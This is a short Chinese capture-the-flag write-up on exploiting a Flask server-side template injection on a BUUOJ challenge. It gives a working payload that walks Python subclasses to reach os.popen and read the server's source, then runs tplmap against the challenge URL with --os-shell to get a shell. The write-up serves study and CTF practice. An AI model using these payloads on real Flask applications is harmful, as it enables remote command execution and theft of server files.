一、SSTI
参考链接:CTF|有关SSTI的一切小秘密【Flask SSTI+姿势集+Tplmap大杀器】 - 知乎 (zhihu.com)
先尝试:
发现存在python模板注入,注意不要使用+,网页会出错
根据参考链接,找到 含有 os执行的类,
然后通过 ls , cat 等命令,找到flag,一般在server里
构造payload如下:
?password={{''.__class__.__mro__[1].__subclasses__()[127].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cat app/server.py").read()')}}
使用自动化工具:tplmap
python2 tplmap.py -u http://b9810ff4-d735-400d-b3fe-da796a69d63a.node4.buuoj.cn:81/?password=
发现存在注入: 使用 --os-shell 反弹shell